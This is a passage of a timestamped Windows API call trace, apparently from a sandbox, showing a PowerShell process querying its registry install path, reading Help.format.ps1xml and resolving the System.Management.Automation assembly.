	[0599.905] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d41c, lpData=0x49b830, lpcbData=0x28d418*=0x56 | out: lpType=0x28d41c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d418*=0x56) returned 0x0
	[0599.905] CoTaskMemFree (pv=0x49b830) 
	[0599.905] RegCloseKey (hKey=0x310) returned 0x0
	[0599.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0599.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0599.906] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xe994ed21, Data2=0xef71, Data3=0x4060, Data4=([0]=0xb0, [1]=0x6, [2]=0x8d, [3]=0x87, [4]=0x3d, [5]=0xf4, [6]=0x3d, [7]=0x79))) returned 0x0
	[0599.906] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x3c041673, Data2=0x450b, Data3=0x41b0, Data4=([0]=0xbd, [1]=0xeb, [2]=0x7, [3]=0x82, [4]=0x12, [5]=0xb0, [6]=0x27, [7]=0x8c))) returned 0x0
	[0599.906] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xce40546f, Data2=0xcb2d, Data3=0x449a, Data4=([0]=0xb4, [1]=0xdf, [2]=0xcc, [3]=0x61, [4]=0xb3, [5]=0x8f, [6]=0x32, [7]=0x27))) returned 0x0
	[0599.907] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x2e331eef, Data2=0xbd3e, Data3=0x477c, Data4=([0]=0x88, [1]=0xbe, [2]=0x1a, [3]=0xda, [4]=0x45, [5]=0xa9, [6]=0xea, [7]=0xde))) returned 0x0
	[0599.907] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0599.907] GetFileType (hFile=0x310) returned 0x1
	[0599.907] SetErrorMode (uMode=0x1) returned 0x1
	[0599.907] GetFileType (hFile=0x310) returned 0x1
	[0599.907] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.908] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.908] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.908] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.908] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.908] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.908] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.909] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.910] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.910] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.910] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.911] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.911] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.911] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.911] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.911] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.914] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.914] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.914] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.915] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.915] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.915] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.916] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.916] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.916] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.917] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.917] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.917] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.917] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.918] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.918] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.918] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.923] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.923] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.924] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.924] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.924] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.925] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.925] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.925] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.925] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.926] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.926] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.926] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.927] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.927] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.927] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.928] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.928] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.928] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.930] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.930] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.930] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.931] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.931] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.931] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.932] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.932] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.932] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.933] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.933] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.933] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0599.933] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0xf37, lpOverlapped=0x0) returned 1
	[0599.934] ReadFile (in: hFile=0x310, lpBuffer=0x34fe1f7, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34fe1f7*, lpNumberOfBytesRead=0x28d438*=0x0, lpOverlapped=0x0) returned 1
	[0599.934] ReadFile (in: hFile=0x310, lpBuffer=0x34feb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x34feb58*, lpNumberOfBytesRead=0x28d438*=0x0, lpOverlapped=0x0) returned 1
	[0599.934] CloseHandle (hObject=0x310) returned 1
	[0599.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0599.934] SetErrorMode (uMode=0x1) returned 0x1
	[0599.934] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d3e0 | out: lpFileInformation=0x28d3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0599.934] SetErrorMode (uMode=0x1) returned 0x1
	[0599.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0599.935] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d4c8 | out: phkResult=0x28d4c8*=0x310) returned 0x0
	[0599.935] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d44c, lpData=0x0, lpcbData=0x28d448*=0x0 | out: lpType=0x28d44c*=0x1, lpData=0x0, lpcbData=0x28d448*=0x56) returned 0x0
	[0599.935] CoTaskMemAlloc (cb=0x5a) returned 0x49b830
	[0599.935] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d41c, lpData=0x49b830, lpcbData=0x28d418*=0x56 | out: lpType=0x28d41c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d418*=0x56) returned 0x0
	[0599.935] CoTaskMemFree (pv=0x49b830) 
	[0599.935] RegCloseKey (hKey=0x310) returned 0x0
	[0599.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0599.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0601.585] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xde64526e, Data2=0xc689, Data3=0x425e, Data4=([0]=0xba, [1]=0x30, [2]=0xa3, [3]=0xa5, [4]=0x59, [5]=0x6a, [6]=0x23, [7]=0xf7))) returned 0x0
	[0601.586] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x7a182f9, Data2=0x502e, Data3=0x445e, Data4=([0]=0x96, [1]=0x87, [2]=0x2, [3]=0x3a, [4]=0x97, [5]=0xa8, [6]=0x4d, [7]=0x71))) returned 0x0
	[0601.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0601.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0601.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0601.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.985] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x8e834717, Data2=0xb4c6, Data3=0x4028, Data4=([0]=0x98, [1]=0x48, [2]=0x5d, [3]=0x32, [4]=0xf2, [5]=0x83, [6]=0x9f, [7]=0xfb))) returned 0x0
	[0602.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
